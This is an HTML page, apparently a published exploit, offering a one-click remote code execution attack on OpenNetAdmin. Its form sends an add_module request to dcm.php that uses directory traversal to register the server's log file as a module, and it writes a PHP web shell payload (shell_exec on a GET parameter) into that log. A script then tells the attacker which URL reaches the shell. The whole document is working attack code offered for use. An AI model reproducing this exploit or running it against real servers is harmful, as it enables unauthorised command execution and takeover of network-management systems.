&lt;center&gt;
&lt;head&gt;
&lt;title&gt;0wned Your Network&lt;/title&gt;
&lt;script type=&quot;text/javascript&quot;&gt;
function changeaction()
{
    document.sploit.action = document.getElementById(&quot;url&quot;).value;
    alert('Remember, your shell must be accessed via
'+document.getElementById(&quot;url&quot;).value+'?module=mandat0ry');
}
&lt;/script&gt;
&lt;/head&gt;
&lt;font size=&quot;5&quot;&gt;OpenNetAdmin RCE Exploit&lt;/font&gt;&lt;br /&gt;
&lt;font size=&quot;2&quot;&gt;&lt;i&gt;Now with leet button sploiting action! (oooh,
ahhh!)&lt;/i&gt;&lt;/font&gt;&lt;br /&gt;&lt;br /&gt;
&lt;form action=&quot;/&quot; method=&quot;post&quot; name=&quot;sploit&quot; onsubmit=&quot;changeaction()&quot; &gt;
URL: &lt;input id=&quot;url&quot; value=&quot;http://127.0.0.1/ona/dcm.php&quot; size=&quot;50&quot; /&gt;&lt;br /&gt;
PHP Code to Execute: &lt;input type=&quot;text&quot; size=&quot;50&quot; name=&quot;options[desc]&quot;
value=&quot;&lt;?php echo shell_exec($_GET[1]) ?&gt;&quot;/&gt; &lt;br /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;module&quot; value=&quot;add_module&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;options[name]&quot; value=&quot;mandat0ry&quot; /&gt;
&lt;input type=&quot;hidden&quot; name=&quot;options[file]&quot;
value=&quot;../../../../../../../../../../../var/log/ona.log&quot; /&gt;
&lt;input type=&quot;submit&quot; value=&quot;Exploit!&quot; /&gt;
&lt;/form&gt;
&lt;b&gt;&lt;i&gt;Special thanks to: offsec, twitches, funkenstein, zachzor,
av1dmage, drc, arsinh, and the coders for OpenNetAdmin!&lt;/i&gt;&lt;/b&gt;
&lt;/center&gt;
